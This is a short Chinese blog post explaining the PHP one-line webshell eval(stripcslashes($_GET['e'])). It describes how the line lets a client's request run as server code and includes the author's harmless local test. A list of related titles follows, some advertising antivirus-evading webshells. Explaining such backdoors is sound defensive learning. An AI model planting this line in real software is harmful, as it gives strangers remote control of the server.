php的一句话木马
来源:互联网 发布:为什么电脑打不开软件 编辑:程序博客网 时间:2024/04/30 12:41
偶尔发现一句php代码:
eval(stripcslashes($_GET['e']));
有人说这是一句话木马,于是有了兴趣,便在W3C查了下函数,分析了一下,果然有些可怕。
eval()函数会执行括号内的字符串,比如
eval("echo 'hello world!';");
等同于:
echo "hello world!";
stripcslashes()函数是去反斜杠的,反斜杠通常是用来转义的,以便能够更好更完整的存入数据,读取数据时就需要把它去掉。
结合起来看,这句代码的意思是:执行e参数的值,就是客户端请求什么,服务器执行什么,自己的服务器被别人操控,这不就是木马吗?
我在自己的本地网站上测试了一下,主页加入了这句代码,然后再主页地址后加上这句:?e=echo 'hello world';果然在主页的左上角显示了hello world
0 0
- php的一句话木马
- php 过狗一句话木马的编写
- 关于php一句话木马
- 关于PHP一句话木马
- PHP一句话木马
- php 一句话木马、后门
- 一句话木马的原理
- 一句话木马的使用
- PHP一句话木马,中国菜刀
- 写PHP一句话木马客户端遇到的问题
- 一句话木马的多种写法
- 一句话木马的工作原理
- 一句话木马工作的原理:
- 一句话图片木马的制作
- 2016年11月整理的最新php免杀一句话木马, 2017php免杀一句话(php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话,php过waf一句话)
- php一句话木马(北仑图书馆)
- PHP一句话木马及查杀
- 防止一句话木马,php禁用eval函数
- android 从 service 获取数据 到 activity
- 不再安全的 OSSpinLock
- 1.linux基础
- 腾讯微博Android客户端开发课程
- ListView+Fragment+ViewPager配合,实现今日头条的效果
- php的一句话木马
- 拜拜了,浮动布局-基于display:inline-block的列表布局 张鑫旭博客笔记
- Java Se---常用类(包装类、String)
- javaFX场景改变
- Eclipse配置/集成maven
- 情人节~哈哈
- Day9函数、递归函数、生命周期和作用域、全局变量和局部变量
- mysql base
- 无名安卓Android逆向数据分析培训视频教程